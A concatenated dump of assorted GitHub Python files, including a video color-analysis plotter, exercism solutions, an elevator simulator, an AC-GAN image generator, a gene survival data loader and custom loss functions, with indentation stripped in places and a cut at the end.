#color_perc_list = [] # list of all color percentages of all frames
color_perc_list = np.empty([len(colors),perc_buffer])
###########################################################################################################################
# capture first frame
###########################################################################################################################
# start fps timer
t = time.time()
frame_num = 0
# capture first frame
ret, frame1 = cap.read()
prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
hsv = np.zeros_like(frame1)
hsv[...,1] = 255
###########################################################################################################################
# create plot window
###########################################################################################################################
app = QtGui.QApplication([])
# set background color to white
# pg.setConfigOption('background', 'w')
# pg.setConfigOption('foreground', 'k')
# create window for graphs
win = pg.GraphicsLayoutWidget(show=True, title="Basic plotting examples")
win.resize(1000,600)
win.setWindowTitle('pyqtgraph example: Plotting')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
#win = pg.GraphicsWindow()
###########################################################################################################################
# print frames
###########################################################################################################################
# pimg = win.addPlot(title="imgs")
#
# pq_images = []
# for color ,threshold in colors:
# pq_images.append(pimg.ImageView())
#
# imv = pg.ImageView()
# imv.show()
#
# win.nextRow()
###########################################################################################################################
# color plot
###########################################################################################################################
p = win.addPlot(title="Color Progration Over Time")
p.plot()
p.setWindowTitle('FFT')
p.setLabel('bottom', 'Index', units='B')
p.showGrid(x=True, y=True, alpha=None)
#p.setLimits(yMin=0,yMax=100)
#p.enableAutoRange(axis=None, enable=False)
p.addLegend()
lines_prog = []
for color ,threshold in colors:
#color_scaled = [x for x in color]
rgb_color = tuple(color)
#lines_prog.append(ax_prog.plot([], [], color=rgb_color, label=str(color)))
#lines_prog.append(p.plot( pen=pg.mkPen(pg.QColor(rgb_color), width=5), name=str(rgb_color)))
#lines_prog.append(p.plot( pen=QPen(QColor(255,0,0))))
lines_prog.append(p.plot(pen=rgb_color, width=10, name=str(color),row=0, col=0))
#lines_prog.append(win.addPlot(pen=rgb_color, width=10, name=str(color_scaled),row=0, col=0))
win.nextRow()
###########################################################################################################################
# RGB Histogram plot
###########################################################################################################################
p_hist = win.addPlot(title="Color Histogram")
p_hist.plot()
p_hist.setWindowTitle('histogram')
p_hist.setLabel('bottom', 'Index', units='B')
p_hist.addLegend()
p_hist.showGrid(x=True, y=True, alpha=None)
p_hist.setLimits(yMax=1,yMin=0,xMin=0)
phist_colors = ('b', 'g', 'r') # cv2 convention of rgb
phist = []
for color in phist_colors:
rgb_color = tuple(color)
phist.append(p_hist.plot(pen=color, width=10, name=str(color)))
###########################################################################################################################
# fft plot
###########################################################################################################################
win.nextRow()
RATE = 30
data_fft=np.zeros(perc_buffer)
axis_fft=np.fft.fftfreq(perc_buffer, d=1.0/RATE)
p_fft = win.addPlot(title="FFT")
p_fft.plot()
p_fft.setWindowTitle('FFT')
p_fft.setLabel('bottom', 'Index', units='B')
p_fft.addLegend()
p_fft.showGrid(x=True, y=True, alpha=None)
p_fft.setLimits(yMax=100,yMin=0)
#p_fft.autoRange(enable=False)
pfft = []
for color ,threshold in colors:
color_scaled = [x for x in color]
rgb_color = tuple(color_scaled)
pfft.append(p_fft.plot(axis_fft,data_fft, pen=rgb_color, width=10, name=str(color_scaled),row=0, col=1))
###########################################################################################################################
# histogram LAB color space
###########################################################################################################################
p_hist_lab = win.addPlot(title="Color Histogram LAB ")
p_hist_lab.plot()
p_hist_lab.setWindowTitle('histogram')
p_hist_lab.setLabel('bottom', 'Index', units='B')
p_hist_lab.addLegend()
p_hist_lab.showGrid(x=True, y=True, alpha=None)
p_hist_lab.setLimits(yMax=1,yMin=0,xMin=0)
phist_colors_names = ('y', 'k', 'r')
phist_lab = []
name_lab = ["l","a","b"]
for i, color in enumerate(name_lab):
rgb_color = tuple(color)
phist_lab.append(p_hist_lab.plot(pen=phist_colors_names[i], width=10, name=str(name_lab[i])))
###########################################################################################################################
# update
###########################################################################################################################
def update():
global lines_prog, data, t, frame_num, colors, color_perc_list, \
show_imgs_for_colors, p, pfft, data_fft, axis_fft, RATE, phist_colors
# read frame
img, frame2 = read_frame(0.5)
# calatulate color percentage
color_prec_frame = [] # list of color percentages for current frame
imgs = img # save orginal image
index = 0
for color, threshold in colors:
color_pers_i, img = percent_color_singel(img, color=color, threshold=threshold, disp= str(color))
color_prec_frame.append(color_pers_i)
imgs = np.hstack((imgs,img))
index += 1
if show_imgs_for_colors == 1:
#images_per_row = 2
#cv2.imshow( "ALL_1", np.hstack(imgs))
cv2.imshow( "ALL_1", imgs)
# for x in enumerate(pq_images):
# #pimg.image(x)
# x.setImage(imgs[i])
#x.setData(imgs[i])
# add color from frame the last frames perc list
color_perc_list = np.roll(color_perc_list, -1, axis=1)
color_perc_list[:,-1] = color_prec_frame
# update data for line Progration
for i, x in enumerate(lines_prog):
#print(color_perc_list[i,:])
x.setData(color_perc_list[i,:])
# map(lambda x,y: x.setData(y), lines_prog, color_perc_list.tolist())
# update RGB color space histogram and set plot data
for i, x in enumerate(phist):
histr = cv2.calcHist([frame2], [i], None, [256], [0, 256])
histr = cv2.normalize(histr,histr)
#print(np.shape(histr))
x.setData(np.reshape(histr, np.shape(histr)[0]))
# update fft and set data for plot
for i, x in enumerate(pfft):
# calc fft
data_fft = color_perc_list[i,:]
fft_data=FFT_AMP(data_fft)
axis_pfft=np.fft.fftfreq(len(data_fft), d=1.0/RATE)
#plot data
x.setData(x=np.abs(axis_fft), y=fft_data)
# update lab colorspace histogram and set data for plot
frame2Lab = cv2.cvtColor(frame2, cv2.COLOR_BGR2LAB)
for i, x in enumerate(phist_lab):
histr = cv2.calcHist([frame2Lab], [i], None, [256], [0, 256])
histr = cv2.normalize(histr,histr)
#print(np.shape(histr))
x.setData(np.reshape(histr, np.shape(histr)[0]))
# calc frame rate
if frame_num%10 == 0:
elapsed = time.time() - t
print("fps: " + str(10/elapsed))
t = time.time()
app.processEvents() ## force complete redraw for every plot
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
``` |
{
"source": "3mtee/exercism-python",
"score": 4
} |
#### File: exercism-python/darts/darts.py
```python
from math import sqrt
def score(x, y):
d = sqrt(x ** 2 + y ** 2)
if d <= 1:
return 10
if d <= 5:
return 5
if d <= 10:
return 1
return 0
```
#### File: exercism-python/difference-of-squares/difference_of_squares.py
```python
def square_of_sum(number):
return sum(range(0, number + 1)) ** 2
def sum_of_squares(number):
return sum([i ** 2 for i in range(0, number + 1)])
def difference_of_squares(number):
return square_of_sum(number) - sum_of_squares(number)
```
#### File: exercism-python/hangman/hangman.py
```python
STATUS_WIN = "win"
STATUS_LOSE = "lose"
STATUS_ONGOING = "ongoing"
class Hangman:
def __init__(self, word):
self.remaining_guesses = 9
self.status = STATUS_ONGOING
self.word = word
self.masked_word = "".join("_" for x in word)
def guess(self, char):
if self.status != STATUS_ONGOING:
raise ValueError("Game is over")
new_masked = "".join(m if w != char or m != "_" else w for w, m in zip(self.word, self.masked_word))
if new_masked == self.masked_word:
self.remaining_guesses -= 1
self.masked_word = new_masked
if self.masked_word.find("_") == -1:
self.status = STATUS_WIN
return
if self.remaining_guesses < 0:
self.status = STATUS_LOSE
def get_masked_word(self):
return self.masked_word
def get_status(self):
return self.status
```
#### File: exercism-python/high-scores/high_scores.py
```python
def latest(scores):
return scores[-1]
def personal_best(scores):
return max(scores)
def personal_top_three(scores):
sorted_scores = sorted(scores, reverse=True)
return sorted_scores[0:3]
```
#### File: exercism-python/isogram/isogram.py
```python
def is_isogram(string: str):
clean_string = "".join(c for c in string.lower() if c.isalpha())
return len(set(clean_string)) == len(clean_string)
```
#### File: exercism-python/matrix/matrix.py
```python
class Matrix:
def __init__(self, matrix_string: str):
lines = matrix_string.splitlines()
self.__matrix = [list(map(int, line.split())) for line in lines]
def row(self, index):
return self.__matrix[index - 1]
def column(self, index):
return [row[index - 1] for row in self.__matrix]
```
#### File: exercism-python/protein-translation/protein_translation.py
```python
codon_protein = {
"AUG": "Methionine",
"UUU": "Phenylalanine",
"UUC": "Phenylalanine",
"UUA": "Leucine",
"UUG": "Leucine",
"UCU": "Serine",
"UCG": "Serine",
"UCC": "Serine",
"UCA": "Serine",
"UAU": "Tyrosine",
"UAC": "Tyrosine",
"UGU": "Cysteine",
"UGC": "Cysteine",
"UGG": "Tryptophan",
"UAA": None,
"UAG": None,
"UGA": None
}
def proteins(strand: str):
codons = get_codons(strand)
result = []
for codon in codons:
protein = codon_protein[codon]
if protein is None:
break
if protein not in result:
result.append(protein)
return result
def get_codons(strand):
chunk_size = 3
codons = [strand[i:i + chunk_size] for i in range(0, len(strand), chunk_size)]
return codons
```
#### File: exercism-python/saddle-points/saddle_points.py
```python
def saddle_points(matrix):
if len(set(map(len, matrix))) > 1:
raise ValueError("Irregular matrices are forbidden")
rotated_matrix = list(zip(*matrix))
points = set()
for i, row in enumerate(matrix):
for j, x in enumerate(row):
if x == max(row) and x == min(rotated_matrix[j]):
points.add((i, j))
return [{"row": p[0] + 1, "column": p[1] + 1} for p in points]
```
#### File: exercism-python/series/series.py
```python
def slices(series, length):
series_length = len(series)
if length > series_length or length < 1:
raise ValueError("Incorrect length was requested")
return [series[a:a + length] for a in range(0, series_length - length + 1)]
```
#### File: exercism-python/space-age/space_age.py
```python
class SpaceAge:
PLANET_RATIOS = [(k, v * 31557600) for k, v in (
('earth', 1.0),
('mercury', 0.2408467),
('venus', 0.61519726),
('mars', 1.8808158),
('jupiter', 11.862615),
('saturn', 29.447498),
('uranus', 84.016846),
('neptune', 164.79132)
)]
def __init__(self, seconds):
self.seconds = seconds
for planet, ratio in self.PLANET_RATIOS:
setattr(self, 'on_' + planet, self._planet_years(ratio))
def _planet_years(self, ratio):
return lambda r=ratio: round(self.seconds / r, 2)
``` |
{
"source": "3n5/functions-python",
"score": 4
} |
#### File: 3n5/functions-python/[function] matrix and csv.py
```python
import numpy
import csv
import pandas
dir_input=r'C:/Users/user/Desktop/input_data.csv'
dir_output=r'C:/Users/user/Desktop/output_data.csv'
df = pandas.read_csv(f'{dir_input}',encoding='UTF-8', header=None) #No index
df = df.values #'numpy.ndarray' #[1:,1:,]#index
df = df[1:3,1:3]#snip
df = numpy.where(df > 3, 1, -1)#if
df = pandas.DataFrame(df)
df.to_csv(f'{dir_output}',index=False,header=None)
"""transpose of a matrix"""
def matrix_transposed():
print(__doc__)
import numpy as np
import csv
A=[1,2,3]
B=[4,5,6]
C=[7,8,9]
D=[A,B,C]
print(D) #[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
DT= np.array(D).T.tolist()
print(DT)#[[1, 4, 7], [2, 5, 8], [3, 6, 9]]
with open('data.csv', 'w') as file:
writer = csv.writer(file, lineterminator='\n')
writer.writerows(DT)
```
#### File: 3n5/functions-python/[functions] Time_related.py
```python
def time_elapsed():
import time
print(__doc__)
start = time.time()
print('== Replace the program you want to time here ==') and time.sleep(1)
end = time.time()
_time=end-start
hour,min,sec=_time//3600,_time//60,_time%60
print(f'It takes about {hour:.0f} hours {min:.0f} min {sec:.0f} sec')
return 0
time_elapsed()
"""Get the current time"""
def time_current():
import datetime
print(__doc__)
current=datetime.datetime.today().strftime('%Y%m%d_%H%M%S')
print(current)
time_current()
```
#### File: 3n5/functions-python/png2csv.py
```python
import numpy as np
import imageio
file="900o"
def png2csv(file):
img = (imageio.imread("{0}.png".format(file), as_gray=True))
img = np.array(img)
np.savetxt("{0}.csv".format(file), img, delimiter=",")
png2csv("z48mm_rot000_3")
png2csv("z40mm_rot004_3")
png2csv("z40mm_rot000_3")
png2csv("re_z48mm_00deg_phs")
png2csv("re_z48mm_00deg_amp")
png2csv("re_z40mm_04deg_phs")
png2csv("re_z40mm_04deg_amp")
png2csv("re_z40mm_00deg_phs")
png2csv("re_z40mm_00deg_amp")
``` |
{
"source": "3NCRY9T3R/HacktoberFest-DSC-ABESEC",
"score": 4
} |
#### File: HacktoberFest-DSC-ABESEC/Python/diamondpattern.py
```python
def pattern(n):
k = 2 * n - 2
for i in range(0, n):
for j in range(0 , k):
print(end=" ")
k = k - 1
for j in range(0 , i + 1 ):
print("* ", end="")
print("\r")
k = n - 2
for i in range(n , -1, -1):
for j in range(k , 0 , -1):
print(end=" ")
k = k + 1
for j in range(0 , i + 1):
print("* ", end="")
print("\r")
num=int(input("Enter number of integer to print diamond "))
pattern(num)
```
#### File: HacktoberFest-DSC-ABESEC/Python/tree.py
```python
class Node:
def __init__(self, data):
self.left = None
self.right = None
self.data = data
def PrintTree(self):
print(self.data)
root = Node(10)
root.PrintTree()
Traversing a Linked List
class Node:
def __init__(self, dataval=None):
self.dataval = dataval
self.nextval = None
class SLinkedList:
def __init__(self):
self.headval = None
def listprint(self):
printval = self.headval
while printval is not None:
print (printval.dataval)
printval = printval.nextval
list = SLinkedList()
list.headval = Node("Mon")
e2 = Node("Tue")
e3 = Node("Wed")
# Link first Node to second node
list.headval.nextval = e2
# Link second Node to third node
e2.nextval = e3
list.listprint()
``` |
{
"source": "3ndG4me/ElevatorSim",
"score": 3
} |
#### File: 3ndG4me/ElevatorSim/CarBtn.py
```python
from ElevatorComponent import ElevatorComponent
from Messages import *
class CarBtn(ElevatorComponent):
def __init__(self, ElevatorCar):
super().__init__()
# output
self.OUT = None # Recipient is Car Controller
# Coupled Input/Output: Sends and receives from Car Controller so an instance of the controller is needed
self.car = ElevatorCar
def press(self, id):
# Send Message MsgReq -> OUT
self.OUT = MsgReq("out", id)
# Generate button pressed log
self.write_log(self.get_sim_time(), self.get_real_time(),"Car Btn","Elevator Car","S","out",self.OUT)
self.car.setoReqMsg(self.OUT)
def state_processor(self):
pass
def main(self):
pass
if __name__ == '__main__':
car = None
button = CarBtn(car)
button.main()
```
#### File: 3ndG4me/ElevatorSim/Floor.py
```python
import time
from ElevatorComponent import ElevatorComponent
from Messages import MsgFloor, CommandFloor, MsgDoor, CommandDoor, StatusDoor, MsgReq
from enum import Enum
class STATE(Enum):
"""
States used exclusively by Floor
"""
OPENED = "opened"
CLOSED = "closed"
class FloorDoor(ElevatorComponent):
processing_time = 5.0 # double, set arbitrarily
motion_time = 3.0 # double, set arbitrarily
def __init__(self, floor_id, iCmd, oStatus):
super().__init__()
# component variables
self.id = floor_id # int
self.job = None # entity
self.input = iCmd
self.out = oStatus
self.state = STATE.CLOSED
def open_door(self):
# print("FLOOR {} OPENING DOOR...").format(self.id)
time.sleep(self.motion_time)
self.state = STATE.OPENED
msg = MsgDoor("oStatus", StatusDoor().DOOR_FLOOR_OPENED, self.id, False)
self.write_log(self.get_sim_time(), self.get_real_time(),"Floor_" + str(self.id), "", "C", "", msg)
self.out.send(msg)
self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.id), "DoorStatusProc", "S", "oStatus", msg)
def close_door(self):
# print("FLOOR {} CLOSING DOOR...").format(self.id)
time.sleep(self.motion_time)
self.state = STATE.CLOSED
msg = MsgDoor("oStatus", StatusDoor().DOOR_FLOOR_CLOSED, self.id, False)
self.write_log(self.get_sim_time(), self.get_real_time(),"Floor_" + str(self.id), "", "C", "", msg)
self.out.send(msg)
self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.id), "DoorStatusProc", "S", "oStatus", msg)
def receive_in(self):
if self.input.poll():
msg = self.input.recv()
self.write_log(self.get_sim_time(), self.get_real_time(), "ElevCtrl", "Floor_" + str(self.id), "R", "iCmd", msg)
self.job = msg.contents.get("value")
return True
else:
return False
def state_processor(self):
while True:
if self.receive_in():
# print("FLOOR {} JOB is {}".format(self.id, self.job))
if self.job == CommandDoor.DOOR_FLOOR_X_OPEN:
# print("FLOOR_{} opening door...".format(self.id))
self.job = None
self.open_door()
"""
if self.state == STATE.OPENED:
continue
else:
self.open_door()
"""
elif self.job == CommandDoor.DOOR_FLOOR_X_CLOSE:
# print("FLOOR_{} closing door...".format(self.id))
self.job = None
self.close_door()
"""
if self.state == STATE.CLOSED:
continue
else:
self.close_door()
"""
elif self.state == STATE.OPENED:
time.sleep(self.processing_time)
self.close_door()
continue
def main(self):
self.state_processor()
class Floor(ElevatorComponent):
def __init__(self, floor_id, in_cmd, out_req, out_status):
super().__init__()
# input
self.iCmd = in_cmd
# outputs
self.oReq = out_req
self.oStatus = out_status
# msg
self.iCmd_msg = None
# component vars
self.door = FloorDoor(floor_id, self.iCmd, self.oStatus)
def state_processor(self):
while True:
continue
def main(self):
self.state_processor()
def send_request(self):
# msg = MsgFloor(CommandFloor.FLOOR_REQ, self.door.id)
msg = MsgReq("oReq", self.door.id)
self.oReq.send(msg)
self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.door.id), "RequestProc", "S", "oReq", msg)
if __name__ == '__main__':
f = Floor(0)
f.main()
```
#### File: 3ndG4me/ElevatorSim/Motor.py
```python
from ElevatorComponent import ElevatorComponent
from Messages import *
class STATE(Enum):
"""
States used exclusively by Motor
"""
PASSIVE = "passive"
BUSY = "busy"
class Motor(ElevatorComponent):
def __init__(self, CarCtrl):
super().__init__()
# input
self.IN = None # Received from Car Controller
# output
self.OUT = None # Recipient is Car Controller
# Coupled Input/Output: Sends and receives from Car Controller so an instance of the controller is needed
self.ctrl = CarCtrl
# component vars
self.state = STATE.PASSIVE # initialize in PASSIVE state
def state_processor(self):
while True:
if self.state == STATE.PASSIVE:
# in ? job && job != null
# Above Met: MoveTo STATE.BUSY
self.IN = self.ctrl.oMotor
# Generate IN log
if(self.IN):
self.write_log(self.get_sim_time(), self.get_real_time(),"Elevator Ctrl","Motor","R","in",self.IN)
if(self.IN.contents["value"] == StatusMotor.MOTOR_MOVING):
self.state = STATE.BUSY
# Generate Status log
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","","C","",self.IN)
elif(self.IN.contents["value"] == StatusMotor.MOTOR_REACHED):
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","","C","",self.IN)
elif self.state == STATE.BUSY:
# Send message MsgMotor -> OUT
self.OUT = MsgMotor("out", StatusMotor.MOTOR_MOVING)
self.ctrl.setiMotor(self.OUT)
# Generate OUT log
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","Elevator Ctrl","S","out",self.OUT)
# MoveTo STATE.PASSIVE
self.state = STATE.PASSIVE
def main(self):
self.state_processor()
if __name__ == '__main__':
ctrl = None
motor = Motor(ctrl)
motor.main()
``` |
{
"source": "3neutronstar/ACGAN-PyTorch",
"score": 3
} |
#### File: 3neutronstar/ACGAN-PyTorch/generate_image.py
```python
from __future__ import print_function
import argparse
import os
import numpy as np
import random
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
from utils import denormalize, weights_init, compute_acc
from network import _netG, _netD, _netD_CIFAR10, _netG_CIFAR10
from folder import ImageFolder
import tqdm
import torchvision.utils as vutils
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', required=True, help='cifar10 | imagenet')
parser.add_argument('--nz', type=int, default=110, help='size of the latent z vector')
parser.add_argument('--eval_epoch', type=int, default=None)
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--n_images', type=int, default=1, help='number of images you want to generate')
parser.add_argument('--outf', default='./training_data', help='folder to output images and model checkpoints')
parser.add_argument('--gpu_id', type=int, default=0, help='The ID of the specified GPU')
parser.add_argument('--manualSeed', type=int,default=0, help='manual seed')
parser.add_argument('--num_classes', type=int, default=10, help='Number of classes for AC-GAN')
opt = parser.parse_args()
# specify the gpu id if using only 1 gpu
if opt.ngpu == 1:
os.environ['CUDA_VISIBLE_DEVICES'] = str(opt.gpu_id)
try:
os.makedirs(opt.outf)
except OSError:
pass
if opt.manualSeed is None:
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
if opt.cuda:
torch.cuda.manual_seed_all(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
# some hyper parameters
ngpu = int(opt.ngpu)
nz = int(opt.nz)
num_classes = int(opt.num_classes)
# Define the generator and initialize the weights
if opt.dataset == 'imagenet':
netG = _netG(ngpu, nz)
else:
netG = _netG_CIFAR10(ngpu, nz)
if opt.dataset == 'imagenet':
netD = _netD(ngpu, num_classes)
else:
netD = _netD_CIFAR10(ngpu, num_classes)
try:
netG_state_dict=torch.load(os.path.join(opt.outf,f'netG_epoch_{opt.eval_epoch}.pth'))
netD_state_dict=torch.load(os.path.join(opt.outf,f'netD_epoch_{opt.eval_epoch}.pth'))
netG.load_state_dict(netG_state_dict)
netD.load_state_dict(netD_state_dict)
except:
raise NotImplementedError
noise = torch.FloatTensor(1, nz, 1, 1)
aux_label = torch.LongTensor(1)
if opt.cuda:
netG.cuda()
netD.cuda()
noise,aux_label=noise.cuda(),aux_label.cuda()
num_generated_images=[0 for _ in range(num_classes)]
i=0
if not os.path.exists(os.path.join(opt.outf,'gen_images')):
os.mkdir(os.path.join(opt.outf,'gen_images'))
for cls_gen in range(num_classes):
if not os.path.exists(os.path.join(opt.outf,'gen_images',f'c{cls_gen}')):
os.mkdir(os.path.join(opt.outf,'gen_images',f'c{cls_gen}'))
while sum(num_generated_images)<opt.n_images:
cls_gen=i%num_classes # which class you want to generate
if num_generated_images[cls_gen]<=(opt.n_images//num_classes):
class_onehot = np.zeros(num_classes)
class_onehot[cls_gen]=1
noise_ = np.random.normal(0, 1, (1, nz))
noise_[0,:num_classes] = class_onehot
noise_ = (torch.from_numpy(noise_))
noise.data.copy_(noise_.view(1, nz, 1, 1))
fake = netG(noise)
if torch.argmax(netD(fake)[1])==cls_gen:
print(f'\r [{sum(num_generated_images)}/{opt.n_images}] saving images complete',end='')
#save image
vutils.save_image(denormalize(fake,opt.dataset).squeeze(0),os.path.join(opt.outf,'gen_images',f'c{cls_gen}',f'{i}.png'))
num_generated_images[cls_gen]+=1
else:
print(f'fail to save class {cls_gen} when i is {i}')
i+=1
if __name__=='__main__':
main()
``` |
{
"source": "3neutronstar/DHP",
"score": 3
} |
#### File: 3neutronstar/DHP/Dataloader.py
```python
import pandas as pd
import os
from lifelines import CoxPHFitter
from lifelines.utils import k_fold_cross_validation
import numpy as np
class Dataloader(object):
def __init__(self):
self.data = self._load_csv()
def _filter_method(self,data):
'''
cox p value기반 filtering index잡기
'''
cox = CoxPHFitter()
#fitting
total=data['total']
gene=data['gene']
all=pd.concat([total,gene],axis=1)
cox.fit(all, duration_col='time', event_col='event', show_progress=True)
df=cox.summary
df=df.loc[df.index.isin([f'G{i}' for i in range(1,301)])]
i=df.sort_values(by=['-log2(p)'],ascending=False)
index=i.index
# #cross-validation
# cox_cv_result = k_fold_cross_validation(cox, all, duration_col='time', event_col='event', k=5,seed=0)
# print('C-index(cross-validation) = ', np.mean(cox_cv_result))
print(list(index))
return index
def _load_csv(self, data_dir="datasets"):
cur_dir = os.getcwd()
data_dir_path = os.path.join(cur_dir, data_dir)
data = {}
csv_name = {
"clinic": "Clinical_Variables.csv",
"gene": "Genetic_alterations.csv",
"treatment": "Treatment.csv",
"survival": "Survival_time_event.csv",
"total": "Total_data.csv"
}
for type, name in csv_name.items():
csv_path = os.path.join(data_dir_path, name)
data[type] = pd.read_csv(csv_path, index_col=0)
self.gene_p_value_arg_min = self._filter_method(data)
# self.gene_p_value_arg_min=[f'G{i}' for i in range(1,301)]
# self.gene_p_value_arg_min = ['G75', 'G173', 'G192', 'G27', 'G202', 'G63', 'G179', 'G260', 'G65', 'G1', 'G177', 'G96',
# 'G93', 'G175', 'G186', 'G122', 'G145', 'G53', 'G281', 'G14', 'G154', 'G25', 'G139',
# 'G9', 'G272', 'G112', 'G89', 'G167', 'G200', 'G20', 'G224', 'G55', 'G257', 'G269',
# 'G249', 'G246', 'G210', 'G238', 'G231', 'G88', 'G190', 'G103', 'G265', 'G68', 'G262',
# 'G24', 'G199', 'G2', 'G125', 'G289', 'G128', 'G124', 'G230', 'G254', 'G263', 'G18',
# 'G150', 'G73', 'G44', 'G287', 'G64', 'G148', 'G49', 'G52', 'G130', 'G212', 'G156',
# 'G225', 'G271', 'G188', 'G90', 'G66', 'G236', 'G19', 'G133', 'G165', 'G227', 'G161',
# 'G108', 'G195', 'G250', 'G244', 'G159', 'G292', 'G208', 'G37', 'G217', 'G8', 'G129',
# 'G290', 'G203', 'G118', 'G300', 'G248', 'G171', 'G256', 'G70', 'G107', 'G226', 'G283',
# 'G149', 'G168', 'G30', 'G278', 'G115', 'G242', 'G211', 'G113', 'G60', 'G82', 'G97',
# 'G205', 'G126', 'G209', 'G239', 'G132', 'G17', 'G172', 'G144', 'G213', 'G215', 'G32',
# 'G41', 'G245', 'G261', 'G163', 'G80', 'G94', 'G234', 'G174', 'G59', 'G7', 'G74', 'G298',
# 'G233', 'G3', 'G232', 'G201', 'G84', 'G136', 'G99', 'G162', 'G21', 'G50', 'G134',
# 'G140', 'G219', 'G178', 'G38', 'G120', 'G153', 'G237', 'G189', 'G282', 'G214', 'G176',
# 'G61', 'G117', 'G76', 'G40', 'G276', 'G152', 'G77', 'G274', 'G160', 'G111', 'G34',
# 'G102', 'G155', 'G5', 'G297', 'G56', 'G295', 'G222', 'G47', 'G35', 'G11', 'G101', 'G46',
# 'G268', 'G137', 'G286', 'G240', 'G92', 'G43', 'G62', 'G135', 'G157', 'G299', 'G100',
# 'G16', 'G143', 'G218', 'G36', 'G86', 'G4', 'G264', 'G296', 'G147', 'G69', 'G72', 'G81',
# 'G259', 'G164', 'G141', 'G131', 'G85', 'G247', 'G26', 'G196', 'G6', 'G51', 'G71',
# 'G181', 'G57', 'G184', 'G13', 'G228', 'G221', 'G284', 'G294', 'G216', 'G31', 'G151',
# 'G67', 'G191', 'G87', 'G116', 'G252', 'G33', 'G123', 'G170', 'G54', 'G48', 'G28',
# 'G206', 'G104', 'G279', 'G229', 'G158', 'G79', 'G291', 'G106', 'G255', 'G110', 'G266',
# 'G223', 'G235', 'G198', 'G91', 'G243', 'G204', 'G12', 'G169', 'G288', 'G197', 'G23',
# 'G119', 'G183', 'G220', 'G251', 'G241', 'G95', 'G42', 'G267', 'G185', 'G207', 'G285',
# 'G105', 'G127', 'G182', 'G180', 'G146', 'G10', 'G98', 'G193', 'G58', 'G258', 'G187',
# 'G275', 'G166', 'G280', 'G83', 'G270', 'G277', 'G78', 'G22', 'G142', 'G15', 'G114',
# 'G45', 'G293', 'G253', 'G29', 'G109', 'G121', 'G138', 'G39', 'G194', 'G273']
return data
def get_k_gene(self, gene_select_num):
'''
:param gene_select_num: 필요한 유전자 갯수
:return: 모든 환자의 유전자 정보 중 p-value가 작은 유전자 순으로 gene_select_num 갯수만큼 추출하여 반환.
'''
new_order_data = self.data['gene'][self.gene_p_value_arg_min[:gene_select_num]]
return new_order_data
def get_event(self):
return self.data['survival']['event']
def get_treatment(self):
return self.data['treatment']['Treatment']
def get_survival_time(self):
return self.data['survival']['time']
def get_clinic_var(self):
return self.data['clinic']
if __name__ == '__main__':
dl = Dataloader()
print(dl.get_k_gene(300))
``` |
{
"source": "3neutronstar/ml_benchmark",
"score": 3
} |
#### File: ml_benchmark/CustomLoss/crossentropyloss.py
```python
import torch
from CustomLoss.baseloss import BaseLoss
import torch.nn.functional as F
import torch.nn as nn
class CrossEntropyLoss(nn.Module):
def __init__(self, custom_loss_reduction):
super(CrossEntropyLoss,self).__init__()
self.custom_loss_reduction=custom_loss_reduction
def forward(self,prediction,target):
crossentropy=torch.diagonal(torch.matmul(-F.log_softmax(prediction,dim=1),target.T))
if self.custom_loss_reduction=='mean':
crossentropy=crossentropy.mean()
elif self.custom_loss_reduction=='sum':
crossentropy=crossentropy.sum()
return crossentropy
class ModifyTargetCrossEntropyLoss(BaseLoss):
def __init__(self, classification_criterion,custom_loss_reduction, reduction):
super(ModifyTargetCrossEntropyLoss,self).__init__(classification_criterion, reduction=reduction)
self.custom_loss_reduction=custom_loss_reduction
self.modify_target_criterion=CrossEntropyLoss(custom_loss_reduction)
def forward(self,prediction,target):
#basic
classification_loss=self.classification_criterion(prediction,target)
#custom
modifytarget=torch.zeros_like(prediction)
target_index=torch.ones_like(target).unsqueeze(-1).cumsum(dim=0)-1
target=target.unsqueeze(-1)
modifytarget[target_index,target]=1#참
modifytarget_loss=self.modify_target_criterion(prediction,modifytarget)
loss=classification_loss+modifytarget_loss
return loss
def covariance_loss(logits, labels, T, device):
bsz, n_cats, n_heads = logits.size()
if n_heads < 2:
return 0
all_probs = torch.softmax(logits/T, dim=1)
label_inds = torch.ones(bsz, n_cats).cuda(device)
label_inds[range(bsz), labels] = 0
# removing the ground truth prob
probs = all_probs * label_inds.unsqueeze(-1).detach()
# re-normalize such that probs sum to 1
#probs /= (all_probs.sum(dim=1, keepdim=True) + 1e-8)
probs = (torch.softmax(logits/T, dim=1) + 1e-8)
# cosine regularization
#### I added under 2-line
probs -= probs.mean(dim=1, keepdim=True)
probs = probs / torch.sqrt(((probs ** 2).sum(dim=1, keepdim=True) + 1e-8))
####
#probs = probs / torch.sqrt(((all_probs ** 2).sum(dim=1, keepdim=True) + 1e-8))
cov_mat = torch.einsum('ijk,ijl->ikl', probs, probs)
pairwise_inds = 1 - torch.eye(n_heads).cuda(device)
den = bsz * (n_heads -1) * n_heads
loss = ((cov_mat * pairwise_inds).abs().sum() / den)
return loss
```
#### File: ml_benchmark/Dataset/dataset.py
```python
from numpy import int16
from torchvision import datasets
import torchvision.transforms as transforms
import torch
import sys
from six.moves import urllib
from Dataset.preprocess import *
def load_dataset(configs):
if sys.platform=='linux':
dataset_path='../data/dataset'
elif sys.platform=='win32':
dataset_path='..\data\dataset'
else:
dataset_path='../data/dataset'
opener = urllib.request.build_opener()
